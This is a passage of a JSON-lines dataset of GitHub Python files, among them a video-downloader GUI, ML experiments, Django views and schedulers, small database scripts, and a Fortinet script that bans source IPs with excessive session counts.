Sites\")\n\n\nLabel(root, text=\"Tool for downloading Videos\", font='{nimbus roman} 20 bold italic', foreground='light sea green').grid(row=1, column=1)\n\nent = Entry(root, width=40, textvariable=pastes)  # grid() returns None, so keep the widget reference before placing it\nent.grid(row=3, column=1, sticky='w')\nLabel(root, text=\"Enter the Video url:\").grid(row=3, column=0, sticky='w')\nRadiobutton(root, variable=ticked, value=1).grid(row=6, column=0,sticky='e')\nRadiobutton(root, variable=ticked, value=2).grid(row=5, column=0,sticky='e')\nButton(root, text='Download', command=download).grid(row=7, column=2)\nLabel(root, text='mp3/audio').grid(row=5, column=1, sticky='w')\nLabel(root, text='mp4/video').grid(row=6, column=1, sticky='w')\n\nticked.set(2)\n\npopup = Menu(ent)\npopup.add_command(label='paste', underline=0, command=paste)\n\npaste()\n#ent.bind('<Button-3>', show_popup, add=None)\nroot.bind_all('<Return>', download)\n\nroot.config(menu=menu_bar)\nmainloop()\n","repo_name":"ChromeGenesis/Gemate-Gtk","sub_path":"gemate_gtk.py","file_name":"gemate_gtk.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"55"} +{"seq_id":"17152409865","text":"\"\"\"\nconstants.py contains constant values used throughout the 'friends' app.\n\"\"\"\nfrom access_token import *\n\n# Constants\nMAXIMUM_RESULTS_PER_QUERY = 5000\nSAFE_RESULTS_PER_QUERY = 1000\n\n# FQL Queries\nUSER_QUERY = 'SELECT uid, name FROM 
user WHERE uid=me()'\nFRIENDS_QUERY = 'SELECT uid, name, mutual_friend_count FROM user WHERE uid IN (SELECT uid2 FROM friend WHERE uid1 = me())'\n\nFRIENDSHIPS_BETWEEN_FRIENDS_AND_PEOPLE_QUERY = lambda friend_IDs: 'SELECT uid1, uid2 FROM friend WHERE uid1 IN (' + ','.join(friend_IDs) + ') AND uid2 in (SELECT uid2 FROM friend WHERE uid1=me())'\nFRIEND_COUNT_PER_FRIENDSHIP_QUERY = lambda number_of_friends, graph_density: int(SAFE_RESULTS_PER_QUERY / graph_density / number_of_friends)","repo_name":"jimmyjwu/social_circles","sub_path":"friends/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"5012937393","text":"import numpy as np\nfrom scipy.special import softmax\nimport torch\nfrom torch.utils.data import TensorDataset\n\nfrom tta.datasets import MultipleDomainDataset\n\n\nclass MultipleDomainCXR(MultipleDomainDataset):\n\n def build(self, generator, datastore, labels, Y_col, Z_col, patient_col, target_domain_count, source_domain_count):\n # Pathology: 0 = Negative, 1 = Positive\n # GENDER: 0 = Female, 1 = Male\n labels[\"M\"] = 2 * labels[Y_col] + labels[Z_col]\n print(f\"histogram({Y_col}, {Z_col}) =\", labels[\"M\"].value_counts().sort_index().values)\n\n marginal_Y = labels[Y_col].value_counts(normalize=True).sort_index().values\n marginal_Z = labels[Z_col].value_counts(normalize=True).sort_index().values\n print(\"marginal_Y\", marginal_Y)\n print(\"marginal_Z\", marginal_Z)\n\n # joint distribution of Y and Z\n p_11_min = max(0, marginal_Y[1] + marginal_Z[1] - 1)\n p_11_max = min(marginal_Y[1], marginal_Z[1])\n anchor1 = np.array([\n [1 - marginal_Y[1] - marginal_Z[1] + p_11_min, marginal_Z[1]-p_11_min ],\n [marginal_Y[1] - p_11_min, p_11_min ]\n ])\n anchor2 = np.array([\n [1 - marginal_Y[1] - marginal_Z[1] + p_11_max, marginal_Z[1]-p_11_max ],\n [marginal_Y[1] - p_11_max, p_11_max ]\n ])\n print(\"anchor1\", anchor1)\n print(\"anchor2\", anchor2)\n\n mask = np.ones(len(labels.index), dtype=bool)\n domains = [None for _ in self.confounder_strength]\n\n # Sample source domains\n for i, strength in enumerate(self.confounder_strength):\n if i != self.train_domain:\n continue\n\n quota = labels[\"M\"].loc[mask].value_counts().sort_index().values - target_domain_count\n quota = torch.from_numpy(quota)\n joint_M = torch.from_numpy(strength * anchor1 + (1-strength) * anchor2)\n\n source_domain_count_max = torch.floor(torch.min(quota/joint_M.flatten())).item()\n if source_domain_count is None:\n source_domain_count = source_domain_count_max\n elif source_domain_count > source_domain_count_max:\n raise ValueError(f\"Insufficient samples for the source domain: {source_domain_count} > {source_domain_count_max}\")\n\n count = torch.round(source_domain_count * joint_M).long()\n count = self.fix_count(count, source_domain_count)\n count_flatten = torch.flatten(count)\n assert torch.all(count_flatten <= quota), f\"Insufficient samples for the source domain: {count_flatten} > {quota}\"\n\n joint_M = count / torch.sum(count)\n\n print(f\"histogram(M) = {count.flatten()}\")\n reservation = np.ceil(target_domain_count * np.maximum(anchor1, anchor2).flatten())\n domain, in_sample_patients = self.sample(generator, datastore, labels, Y_col, Z_col, patient_col, mask, count, reservation)\n mask &= ~labels[patient_col].isin(in_sample_patients)\n domains[i] = (domain, joint_M)\n\n remainder = np.sum(mask)\n if remainder < target_domain_count:\n raise ValueError(f\"Not 
enough data for target domains: {remainder} < {target_domain_count}\")\n\n # Sample target domains\n for i, strength in enumerate(self.confounder_strength):\n if i == self.train_domain:\n continue\n\n joint_M = torch.from_numpy(strength * anchor1 + (1-strength) * anchor2)\n count = torch.round(target_domain_count * joint_M).long()\n count = self.fix_count(count, target_domain_count)\n joint_M = count / torch.sum(count)\n\n print(f\"histogram(M) = {count.flatten()}\")\n domain, _ = self.sample(generator, datastore, labels, Y_col, Z_col, patient_col, mask, count, None)\n domains[i] = (domain, joint_M)\n\n return domains\n\n\n def fix_count(self, count, domain_count):\n count = torch.flatten(count)\n\n l1, l2, l3 = torch.topk(count, 3).indices\n if torch.sum(count) > domain_count:\n count[l1] -= 1\n if torch.sum(count) > domain_count:\n count[l2] -= 1\n if torch.sum(count) > domain_count:\n count[l3] -= 1\n\n s1, s2, s3 = torch.topk(count, 3, largest=False).indices\n if torch.sum(count) < domain_count:\n count[s1] += 1\n if torch.sum(count) < domain_count:\n count[s2] += 1\n if torch.sum(count) < domain_count:\n count[s3] += 1\n\n total_count = torch.sum(count)\n if total_count != domain_count:\n raise ValueError(f\"Incorrect total count: {total_count} != {domain_count}\")\n\n count = count.reshape((2, 2))\n return count\n\n\n def sample(self, generator, datastore, labels, Y_col, Z_col, patient_col, mask, count, reservation):\n random_state = 0\n while True:\n in_sample = set()\n for Y in range(2):\n for Z in range(2):\n masked = labels.loc[mask & (labels[\"M\"] == 2 * Y + Z)]\n image_per_patient = masked.groupby(patient_col).size()\n weights = image_per_patient.loc[masked[patient_col]].values\n indices = masked.sample(int(count[Y, Z]), weights=weights, random_state=random_state)\n in_sample.update(indices.index)\n\n class_name = self.__class__.__name__\n if class_name == \"MultipleDomainCheXpert\":\n in_sample_patients = { fname.split(\"/\")[2] for fname in in_sample }\n elif class_name == \"MultipleDomainMIMIC\":\n subject_id = labels[\"subject_id\"]\n in_sample_patients = { subject_id.at[dicom_id].item() for dicom_id in in_sample }\n else:\n raise NotImplementedError(f\"Unknown dataset {class_name}\")\n\n remainder = np.bincount(labels[\"M\"], weights=mask & ~labels[patient_col].isin(in_sample_patients))\n if reservation is None or np.all(remainder >= reservation):\n print(f\" remainder = {remainder} >= {reservation} = target_domain_count\")\n break\n\n random_state += 1\n print(f\" remainder = {remainder} < {reservation} = target_domain_count\")\n\n N = int(torch.sum(count))\n assert len(in_sample) == N, f\"Incorrect number of elements: {len(in_sample)} != {N}\"\n\n x = torch.empty((N, *self.input_shape[1:]))\n y_tilde = torch.empty(N, dtype=torch.long)\n y = torch.empty(N, dtype=torch.long)\n z_flattened = torch.empty(N, dtype=torch.long)\n\n perm = torch.randperm(N, generator=generator)\n for i, key in enumerate(in_sample):\n x[perm[i]] = torch.Tensor(datastore[key])\n row = labels.loc[key]\n y[perm[i]] = y_tilde[perm[i]] = row[Y_col]\n z_flattened[perm[i]] = row[Z_col]\n\n return TensorDataset(x, y_tilde, y, z_flattened), in_sample_patients\n","repo_name":"nalzok/test-time-label-shift","sub_path":"tta/datasets/cxr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7059,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"55"} +{"seq_id":"39628704742","text":"from datetime import datetime\nfrom logging import 
getLogger\nfrom time import sleep\n\nfrom croniter import croniter\nfrom django.core.management.base import BaseCommand\nfrom django.utils import timezone\n\nfrom hexa.pipelines.models import Pipeline, PipelineRunTrigger\n\nlogger = getLogger(__name__)\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n # only run by sequence of 5min\n cutoff = 5 * 60\n\n while True:\n sequence, start_time = [], timezone.now()\n for pipeline in Pipeline.objects.exclude(schedule=None):\n if not croniter.is_valid(pipeline.schedule):\n logger.warning(\"pipeline %s invalid schedule\", pipeline.id)\n continue\n\n if pipeline.last_run:\n last_exec = pipeline.last_run.execution_date\n else:\n last_exec = timezone.now()\n\n cron = croniter(pipeline.schedule, last_exec)\n next_exec_time = cron.get_next(datetime)\n next_exec_delay = (next_exec_time - start_time).total_seconds()\n if next_exec_delay < cutoff:\n sequence.append((pipeline, next_exec_delay, next_exec_time))\n\n logger.debug(\"exec seq %s\", sequence)\n for pipeline, delay, exec_time in sorted(sequence, key=lambda e: e[1]):\n # to have a good quality sequence, correct the next delay with an\n # offset based on the diff between NOW and START\n real_delay = delay - (timezone.now() - start_time).total_seconds()\n if real_delay > 0:\n logger.debug(f\"sleep before run: {real_delay}\")\n sleep(real_delay)\n\n pipeline.run(\n user=None,\n pipeline_version=pipeline.last_version,\n trigger_mode=PipelineRunTrigger.SCHEDULED,\n send_mail_notifications=pipeline.recipients.count() > 0,\n )\n\n empty_delay = cutoff - (timezone.now() - start_time).total_seconds()\n if empty_delay > 0:\n logger.debug(\"sleep end runs: %s\", empty_delay)\n sleep(empty_delay)\n","repo_name":"BLSQ/openhexa-app","sub_path":"hexa/pipelines/management/commands/pipelines_scheduler.py","file_name":"pipelines_scheduler.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"55"} +{"seq_id":"15747788643","text":"#!/usr/bin/env python3\nimport subprocess\nimport os\nimport re\nfrom configparser import ConfigParser\nfrom distutils.command.install import install\nfrom distutils.core import setup\n\ndirname = os.path.dirname(__file__)\nif dirname != '':\n os.chdir(os.path.dirname(__file__))\n\nconfig = ConfigParser()\nconfig.read('etc/myougiden/config.ini')\nversion = config.get('core', 'version')\n\ndef md_to_rest(f):\n '''Very hacky.'''\n\n s = ''\n for line in f:\n line = re.sub(r'!\\[[^]]*\\]\\((.*)\\)', r'\\1', line)\n s += line\n\n s = s.replace(\":\\n\\n\", \"::\\n\\n\")\n return s\n\nwith open('README.md', 'r') as f:\n longdesc=md_to_rest(f)\n\nsetup(name='myougiden',\n version=version,\n description='Japanese/English command-line dictionary',\n long_description=longdesc,\n author='Melissa Boiko',\n author_email='melissa@namakajiri.net',\n url='https://github.com/melissaboiko/myougiden',\n packages=['myougiden'],\n scripts=['bin/myougiden', 'bin/updatedb-myougiden'],\n data_files=[('etc/myougiden/', ['etc/myougiden/config.ini'])],\n license='GPLv3',\n install_requires=[\n 'romkan',\n 'termcolor',\n ],\n python_requires='>=3',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Education',\n 'Intended Audience :: End Users/Desktop',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Natural Language :: English',\n 'Natural Language :: Japanese',\n 'Operating System :: 
POSIX',\n 'Programming Language :: Python :: 3',\n 'Topic :: Education',\n 'Topic :: Text Processing :: Linguistic',\n ]\n )\n\n","repo_name":"melissaboiko/myougiden","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"55"} +{"seq_id":"36035803678","text":"# -*- coding: utf-8 -*-\n\nfrom tinydb import TinyDB, where, Query\n\ndef createStudyTable():\n db = TinyDB('database/db.json')\n tableStudy = db.table('Study')\n\n tableStudy.insert({'patName': 'Hasta adı', 'patID': '3333', 'patSex':'Cinsiyet', 'patAge':'Yaş',\n 'patBirthdate':'Doğum Tarihi', 'procedure':'Protokol', 'examDate':'Çekim Tarihi', 'origFile':'',\n 'importDatetime':'Yakalama zamanı', 'studyID':'tetkikNo', 'fileSHA':'1234567890', 'modality':'OT',\n 'operatorName':'Teknisyen', 'refPhys':'Gönderen Doktor', 'importTime':'11/04/2016 11:21:00',\n 'sentToPacs':'False', 'senTime':'', 'retries':'0'})\n db.close()\n\ndef exist(SHA):\n db = TinyDB('database/db.json')\n tableStudy = db.table('Study')\n study = Query()\n result = tableStudy.contains(study.fileSHA == SHA)\n db.close()\n return result\n\n\ndef testQuery():\n db = TinyDB('database/db.json')\n tableStudy = db.table('Study')\n study = Query()\n pat = tableStudy.search(study.fileSHA == '12345')\n res = pat[0]\n print(res['examDate'])\n db.close()\n\n\ncreateStudyTable()\n#print exist('123456789') db boşşa hata veriyor, yakala\n#testQuery()\n\n#createStudyTable()\n","repo_name":"ysdede/pdf2pacs","sub_path":"patDB.py","file_name":"patDB.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"tr","doc_type":"code","stars":4,"dataset":"github-code","pt":"55"} +{"seq_id":"18508503298","text":"T = int(input())\n\nfor test_case in range(1, T+1):\n chars = input()\n stack = ['']\n\n for i in range(len(chars)):\n # 반복된 문자열이면 넣지 않아\n if chars[i] == stack[-1]:\n stack.pop()\n else:\n stack.append(chars[i])\n\n print(f'#{test_case} {len(stack)-1}')\n\n","repo_name":"yuna872/Algorithm","sub_path":"SWEA/4873_반복문자지우기.py","file_name":"4873_반복문자지우기.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"4144839487","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 5 21:16:23 2019\n\n@author: Afei\n\"\"\"\nimport seaborn as sns\nimport pandas as pd\nimport numpy as np\nimport xlrd\nimport matplotlib.pyplot as plt\nfrom matplotlib.pylab import figure, plot, title, xlabel, ylabel, legend, ylim, show, boxplot\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report, confusion_matrix,accuracy_score\nfrom sklearn import model_selection, tree\n# import warnings filter\nfrom warnings import simplefilter\n# ignore all future warnings\nsimplefilter(action='ignore', category=FutureWarning)\nfrom sklearn.preprocessing import StandardScaler \n \n#%% \n# ------------------------------data preparation-----------------------------\n# ---------------------------------------------------------------------------\n\n\n#import the data set\ndoc = xlrd.open_workbook('C:/Users/A_FEI/Documents/GitHub/ML-DM/HeartDesease/heart.xls').sheet_by_index(0)\nattributeNames = doc.row_values(0, 0, 14)\n\n#import the data to X_og matrix\n#all data\nX_og = np.empty((303, 14))\nfor i, col_id in enumerate(range(0, 14)):\n X_og[:, i] = np.asarray(doc.col_values(col_id, 1, 304))\n\nM = len(attributeNames)\nX_index= 
np.arange(0,M-2)\nX = X_og[:,X_index]\ny = X_og[:,M-1]\n\nX=X[:,[1,2,7,8,9,11]]\n\n#%%\n# ----------------------------Classification Tree----------------------------\n#----------------------------------------------------------------------------\n# Tree complexity parameter - constraint on maximum depth\ntc = np.arange(2, 21, 1)\n\n#standardization\nX = StandardScaler().fit_transform(X)\n\n# K-fold crossvalidation\nK = 10 \nCV = model_selection.KFold(n_splits=K,random_state=42,shuffle=True)\n\n# Initialize variable\nError_train = np.empty((len(tc),K))\nError_test = np.empty((len(tc),K))\n\nk=0\nfor train_index, test_index in CV.split(X):\n print('Computing CV fold: {0}/{1}..'.format(k+1,K))\n\n # extract training and test set for current CV fold\n X_train, y_train = X[train_index,:], y[train_index]\n X_test, y_test = X[test_index,:], y[test_index]\n\n for i, t in enumerate(tc):\n # Fit decision tree classifier, Gini split criterion, different pruning levels\n dtc = tree.DecisionTreeClassifier(criterion='entropy', max_depth=t)\n dtc = dtc.fit(X_train,y_train.ravel())\n y_est_test = dtc.predict(X_test)\n y_est_train = dtc.predict(X_train)\n # Evaluate misclassification rate over train/test data (in this CV fold)\n misclass_rate_test = np.sum(y_est_test != y_test) / float(len(y_est_test))\n misclass_rate_train = np.sum(y_est_train != y_train) / float(len(y_est_train))\n Error_test[i,k], Error_train[i,k] = misclass_rate_test, misclass_rate_train\n\n k+=1\n\n \nmin_error = np.min(Error_test.mean(1))\nopt_idx = np.argmin(Error_test.mean(1))\nopt = opt_idx+2\n\nf = figure()\nboxplot(Error_test.T)\nxlabel('Model complexity (max tree depth)')\nylabel('Test error across CV folds, K={0}'.format(K))\n\nf = figure()\nplt.title(\"Test Error with different tree depth\")\nplot(tc, Error_train.mean(1))\nplot(opt, min_error, 'o')\nplot(tc, Error_test.mean(1))\nxlabel('Model complexity (max tree depth)')\nylabel('Error (misclassification rate, CV K={0})'.format(K))\nlegend(['Error_train','Error_test'])\n \nshow()\nfigure()\ncm_lr = confusion_matrix(y_test,y_est_test)\nplt.title(\"Decision Tree Confusion Matrix\")\nsns.heatmap(cm_lr,annot=True,cmap=\"Blues\",fmt=\"d\",cbar=False)\nprint(classification_report(y_test,y_est_test))\n","repo_name":"LF-Lin/MachineLearning-DataMining-DTU-course-practice-project-","sub_path":"HeartDesease/Project 2/upload/Project2_Code/Classification-DecisionTree.py","file_name":"Classification-DecisionTree.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"42289531688","text":"def daily(context: CallbackContext):\r\n message = \"Hello, this message will be sent only once\"\r\n with Session() as session:\r\n for user in session.query(User).filter(User.show_notifications == True):\r\n context.bot.send_message(chat_id=user.telegram_id, text=message)\r\n\r\n\r\n\r\n\r\nj = updater.job_queue\r\nj.run_once(once, 10)\r\n\r\njob_daily = j.run_daily(daily, days=tuple(range(7)))","repo_name":"Nastvick/Homework3","sub_path":"lecture_16/oldmain.py","file_name":"oldmain.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"13701021385","text":"import numpy as np\nimport time\nfrom functools import partial\nimport heapq\nfrom collections import Counter\nimport multiprocessing as mp\nfrom operator import itemgetter\nfrom math import ceil\nfrom random import shuffle\n\nfrom markov_model_priors 
import generate_priors, generate_transition_matrix\nfrom cspa_clustering import get_clustering\n\n\ndef path_generator(day_paths):\n for path in day_paths:\n if len(path) >= 3:\n for i in range(len(path) - 2):\n two_prior, prior, nxt = path[i:i+3]\n o1, o2 = tuple([prior]), tuple([two_prior, prior])\n yield o1, o2, prior, nxt\n\n\ndef get_xy(paths, tower_pos, o1_tt_pos, o2_tt_pos, o1_curr_mat, o2_curr_mat, le_curr_mat, co_curr_mat):\n for o1, o2, curr, nxt in path_generator(paths):\n o1_prior = o1_curr_mat[o1_tt_pos[o1]]\n o2_prior = o2_curr_mat[o2_tt_pos[o2]]\n\n le_prior = le_curr_mat[tower_pos[curr]]\n co_prior = co_curr_mat[tower_pos[curr]]\n\n info_row = np.concatenate((o1_prior, o2_prior, le_prior, co_prior))\n yield info_row, nxt\n\n\ndef splitter_generator(test_paths, split_size):\n curr_pos, total = 0, len(test_paths)\n while curr_pos + split_size < total:\n sidx = curr_pos\n curr_pos += split_size\n yield test_paths[sidx:curr_pos]\n else:\n yield test_paths[curr_pos:]\n\n\n\ndef knn_worker(test_paths, ref_paths, generator_partial, k=30):\n test_generator = generator_partial(paths=test_paths)\n matches, total = 0, 0\n for curr_vec, nxt_stop in test_generator:\n ref_generator = generator_partial(ref_paths)\n ct, h = 0, list()\n for ref_row, ref_next in ref_generator:\n if ct > k:\n heapq.heappushpop(h, (-np.linalg.norm(ref_row - curr_vec), ref_next))\n else:\n heapq.heappush(h, (-np.linalg.norm(ref_row - curr_vec), ref_next))\n ct += 1\n if Counter((i[1] for i in h)).most_common(1)[0][0] == nxt_stop:\n matches += 1\n total += 1\n return matches, total\n\n\ndef do_logregress():\n cspa_towers, learned_clusts, consensus_clusts, combined_clusts = get_clustering()\n upaths, _, o1_priors_mats, markov_towers, o1_tower_tuples = generate_priors()\n o2_priors_mats, o2_tower_tuples = generate_transition_matrix(upaths, markov_towers, order=2)\n\n tower_pos = dict()\n for i, tow in enumerate(cspa_towers):\n tower_pos[tow] = i\n\n o1_tt_pos = dict()\n for i, ttup in enumerate(o1_tower_tuples):\n o1_tt_pos[ttup] = i\n\n o2_tt_pos = dict()\n for i, ttup in enumerate(o2_tower_tuples):\n o2_tt_pos[ttup] = i\n\n dlength = len(upaths[22])\n print(\"Need to test paths: \", len(upaths[22]))\n\n o1_curr_mat = o1_priors_mats[21]\n o2_curr_mat = o2_priors_mats[21]\n le_curr_mat = learned_clusts[21]\n co_curr_mat = consensus_clusts[21]\n\n paths = [path for day in range(2, 22) for path in upaths[day]]\n\n info_gen_part = partial(get_xy, tower_pos=tower_pos, o1_tt_pos=o1_tt_pos, o2_tt_pos=o2_tt_pos,\n o1_curr_mat=o1_curr_mat, o2_curr_mat=o2_curr_mat, le_curr_mat=le_curr_mat,\n co_curr_mat =co_curr_mat)\n\n p = mp.Pool(processes=6)\n chunks = ceil(dlength/6)*6\n knn_partial = partial(knn_worker, ref_paths=paths, generator_partial=info_gen_part, k=30)\n print(\"Starting call to knn worker\")\n istart = time.time()\n #knn_partial(upaths[22])\n results = [p.apply_async(knn_partial, args=(ipath,)) for ipath in splitter_generator(upaths[22][:140], 25)]\n matched = [r.get() for r in results]\n mtch, total = sum(i[0] for i in matched), sum(i[1] for i in matched)\n print(\"Accuracy was: \", mtch/total, total)\n print(\"Completed working for one, time: \", time.time()-istart)\n\n\nif __name__ == \"__main__\":\n do_logregress()\n\n\n","repo_name":"jmcunnin/uap_andorra","sub_path":"scripts/log_classification.py","file_name":"log_classification.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} 
+{"seq_id":"69919307360","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Opportunity, Element, Response, Application, Member\nfrom .models import Requirement, ApplicationStatus, GenericSkill, RequiredSkill\nfrom .models import LinkedSkill, OpenRecommendation, SkillRecommendation\nfrom .models import Tag, File\n\n\n# Create your views here.\n\ndef index(request):\n\n context = {}\n\n opportunities = Opportunity.objects.all()\n\n context['opportunities'] = opportunities\n\n return render(request, 'opportunities/index.html', context)\n\n\ndef view_opportunity(request, opportunity_slug):\n\n context = {}\n\n opportunity = Opportunity.objects.get(\n slug=opportunity_slug\n )\n\n requirements = Requirement.objects.filter(\n opportunity=opportunity)\n\n applications = Application.objects.filter(\n opportunity=opportunity\n )\n\n required_skills = RequiredSkill.objects.filter(\n opportunity=opportunity\n )\n\n context['opportunity'] = opportunity\n context['requirements'] = requirements\n context['applications'] = applications\n context['required_skills'] = required_skills\n\n return render(request, 'opportunities/view_opportunity.html', context)\n\n\ndef review_applicants(request, opportunity_slug):\n\n context = {}\n\n opportunity = Opportunity.objects.get(\n slug=opportunity_slug\n )\n\n requirements = Requirement.objects.filter(\n opportunity=opportunity)\n\n applications = Application.objects.filter(\n opportunity=opportunity\n )\n\n required_skills = RequiredSkill.objects.filter(\n opportunity=opportunity\n )\n\n responses = Response.objects.filter(\n application__opportunity=opportunity\n )\n\n context['opportunity'] = opportunity\n context['requirements'] = requirements\n context['applications'] = applications\n context['required_skills'] = required_skills\n context['responses'] = responses\n\n return render(request, 'opportunities/review_applicants.html', context)\n\n\n\ndef view_member(request, member_slug):\n\n context = {}\n\n member = Member.objects.get(\n slug=member_slug\n )\n\n skill_links = LinkedSkill.objects.filter(\n member=member)\n\n applications = Application.objects.filter(\n applicant=member\n )\n\n context['member'] = member\n context['skill_links'] = skill_links\n context['applications'] = applications\n\n return render(request, 'opportunities/view_member.html', context)\n\n\ndef view_application(request, application_slug):\n\n context = {}\n\n application = Application.objects.get(\n slug=application_slug\n )\n\n status = ApplicationStatus.objects.get(\n application=application)\n\n requirements = Requirement.objects.filter(\n opportunity=application.opportunity\n )\n\n responses = Response.objects.filter(\n application=application\n )\n\n context['application'] = application\n context['status'] = status\n context['requirements'] = requirements\n context['responses'] = responses\n\n return render(request, 'opportunities/view_application.html', context)\n","repo_name":"ToferC/careers","sub_path":"opportunities/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35148256813","text":"import sqlite3\nimport os\n\nconn = sqlite3.connect('employees.sqlite')\ncursor = conn.cursor()\ncursor.execute('SELECT id, LastName, FirstName from zup_employees WHERE PHOTO IS NULL')\nresults = cursor.fetchall()\n\npresumedFileNameList = []\nfor el in results:\n presumedFileNameList.append(el[1] + ' ' + 
el[2])\n\nphoto_list = os.listdir(r'C:\\Users\\s41bl\\PycharmProjects\\project_birthday\\empl_photo')\nphoto_path = r'C:\\Users\\s41bl\\PycharmProjects\\project_birthday\\empl_photo\\\\'\nfile_names = [os.path.splitext(x)[0] for x in photo_list]\n\nfor photo in file_names:\n if photo.strip() in presumedFileNameList:\n photo_bytes = open(photo_path + photo + '.jpg', 'rb').read()\n cursor = conn.cursor()\n cursor.execute(\"UPDATE zup_employees SET PHOTO = ? WHERE FirstName = ? AND LastName = ?\",\n (photo_bytes, photo.split(\" \")[1], photo.split(\" \")[0]))\n conn.commit()\n\nconn.close()\n","repo_name":"s41blizzard/birthday_project","sub_path":"photo_uploader.py","file_name":"photo_uploader.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34470831417","text":"#!/usr/bin/env python\nimport requests\nfrom collections import Counter\nfrom datetime import datetime, timedelta\nfrom datetime import datetime\nimport numpy as np\nimport time\nimport os\nimport re\nimport ipaddress\nimport json\n\n# för att ta bort alla varningar för https\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n#https://github.com/fortinet-solutions-cse/fortiosapi/blob/master/fortiosapi/fortiosapi.py\n#https://www.used.net.ua/index.php/fajlovyj-arkhiv/category/35-fortinet.html?download=83:fortios-5-6-11-rest-api-reference\n# https://docs.fortinet.com/document/fortigate/7.0.0/new-features/270209/clear-multiple-sessions-with-rest-api-7-0-2\n\n\n#api_token = \n#VDOM = \n#\"VDOM = \"root\"\n\n#where the firewall information and token and vdom information is \nwith open('firewall_inventory.json', 'r') as f:\n FIREWALLSTOKEN = json.load(f)\n\n\n#how many sessions should be allowd before block\nnumber_of_sessions = 200\n#how long time should the block be active\nban_timer_sec = 1800\n#exclude list is what ips should not be blocked\nexclude_list = [\"10.0.0.0/8\", \"192.168.0.0/16\", \"172.16.0.0/12\"]\n\n\n\nheaders = {\n \"Authorization\": \"Bearer \" + FIREWALLSTOKEN['token']\n}\n\n\n\n# Get the current date and time\nnow = datetime.now()\n# Format the date and time string\nformatted_date = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n#print what have been put to Qurantine Monitor\ndef get_qurantine(FIREWALLSTOKEN):\n url = f\"https://{FIREWALLSTOKEN['name']}/api/v2/monitor/user/banned/select/?vdom={FIREWALLSTOKEN['vdom']}\"\n response = requests.get(url, headers=headers, verify=False)\n if response.status_code == 200:\n session_list = response.json()[\"results\"]\n #print (f'session_list: {session_list}')\n for i in session_list:\n print (f\"expires: {datetime.fromtimestamp(i['expires'])} created: {datetime.fromtimestamp(i['created'])} ip_address: {i['ip_address']} source: {i['source']} ipv6: {i['ipv6']}\")\n\ndef print_to_file_3_4(saddr_counter):\n with open('sessions_3_4_delar_av_max.txt', 'a') as file:\n # write a string to the file\n start = '*'*20+f'{formatted_date}'+'*'*20+f'\\n'\n file.write( start )\n for key, value in saddr_counter.items():\n if value > ((number_of_sessions/4)*3):\n #print (f\"if_saddr_counter: {value} - {key}\")\n file.write(f'{key}: {value}'+f'\\n')\n file.write('*'*30+f'\\n')\n\ndef print_to_file_banip_list(ban_list):\n with open('session_banip_list.txt', 'a') as file:\n # write a string to the file\n start = '*'*20+f'{formatted_date}'+'*'*20+f'\\n'\n file.write( start )\n for ban_ip in ban_list:\n #print (f\"if_saddr_counter: {value} - {key}\")\n 
file.write(f'{ban_ip}'+f'\\n')\n file.write('*'*30+f'\\n')\n\nwhile True:\n ban_list = []\n url = f\"https://{FIREWALLSTOKEN['name']}/api/v2/monitor/firewall/session?count=10000&filter-csf=false&ip_version=ipboth&start=0&summary=true&vdom={FIREWALLSTOKEN['vdom']}\"\n\n response = requests.get(url, headers=headers, verify=False)\n\n if response.status_code == 200:\n # Lista på alla sessions\n session_list = response.json()[\"results\"][\"details\"]\n # Använd Counter från collections modulen för att räkna upp antalet förekomster av varje saddr\n saddr_counter = Counter(session['saddr'] for session in session_list)\n\n #print to file, for all 3/4 of max\n print_to_file_3_4(saddr_counter)\n \n # Skapa en lista med bara de sessions som förekommer fler än 5 gånger\n common_sessions = [saddr for saddr, count in saddr_counter.items() if count >= number_of_sessions]\n # Skriv ut den nya listan\n\n for csessions in common_sessions:\n if not any(ipaddress.ip_address(csessions) in ipaddress.ip_network(exclude) for exclude in exclude_list):\n ban_list.append (csessions)\n\n #post \n #if there is multiple firewalls to block ips in, do this to a forloop, and comment out FIREWALLSTOKEN and uncomment firewall\n # for firewall in FIREWALLSTOKEN:\n firewall_name = FIREWALLSTOKEN['name']\n firewall_token = FIREWALLSTOKEN['token']\n firewall_vdom = FIREWALLSTOKEN['vdom']\n # firewall_name = firewall['name']\n # firewall_token = firewall['token']\n # firewall_vdom = firewall['vdom']\n #handele the api 